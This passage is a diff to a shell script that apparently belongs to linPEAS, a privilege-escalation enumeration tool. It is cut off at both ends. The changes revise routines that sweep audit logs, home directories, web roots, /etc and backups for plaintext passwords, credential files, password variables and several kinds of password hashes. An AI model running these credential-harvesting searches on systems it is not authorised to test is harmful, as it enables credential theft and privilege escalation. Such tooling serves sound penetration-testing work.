"s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +##-- IF) Passwords files in home +if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then + print_2title "Finding *password* or *credential* files in home (limit 70)" + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" +fi - ##-- IF) IPs inside logs +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +if [ "$DEBUG" ]; then print_2title "Finding IPs inside logs (limit 70)" (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 echo "" +fi - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" +if [ "$DEBUG" ]; then ##-- IF) Emails inside logs print_2title "Finding emails inside logs (limit 70)" (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" echo "" +fi - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + + + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" echo "" - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & + wait + echo "" - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" + ##-- IF) Find possible regexes + print_2title "Searching Hashed Passwords" +print_3title "Searching Apr1 MD5 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +wait +print_3title "Searching Apache SHA (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +wait +print_3title "Searching Blowfish (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +wait +print_3title "Searching Drupal (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +wait +print_3title "Searching Joomlavbulletin (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +wait +print_3title "Searching Linux MD5 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE 